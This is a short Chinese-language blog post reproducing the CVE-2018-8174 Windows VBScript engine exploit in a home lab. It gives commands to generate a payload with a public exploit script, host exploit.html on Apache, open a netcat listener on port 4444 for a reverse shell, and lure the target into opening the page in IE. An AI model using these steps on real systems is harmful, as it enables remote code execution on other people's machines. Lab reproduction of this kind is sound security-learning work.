threst's Blog

双杀0day漏洞(CVE-2018-8174)复现

2018/09/09 Share

漏洞描述:

CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。
微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174
由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

漏洞复现:

攻击机 IP:192.168.1.101
靶机 IP:192.168.1.111

github:https://github.com/Yt1g3r/CVE-2018-8174_EXP

0x01 生成payload

python CVE-2018-8174.py -u http://192.168.1.101/ -o exp.rtf -i 192.168.1.101 -p 4444

-u:url地址
-o: 输出文件
-i:监听地址
-p:监听端口

0x02 测试

把 explot.html 复制到 /var/www/html/,并开启 apache 服务

sudo cp exploit.html /var/www/html/

开启Apache服务
sudo service apache2 start

攻击机监听端口
nc -lvvp 4444

靶机使用IE打开URL
http://192.168.1.101/exploit.html

靶机打开生成的Word文档也是一样的,可是我没测试成功

CATALOG
  1. 1. 漏洞描述:
  2. 2. 漏洞复现:
  3. 3. 0x01 生成payload
  4. 4. 0x02 测试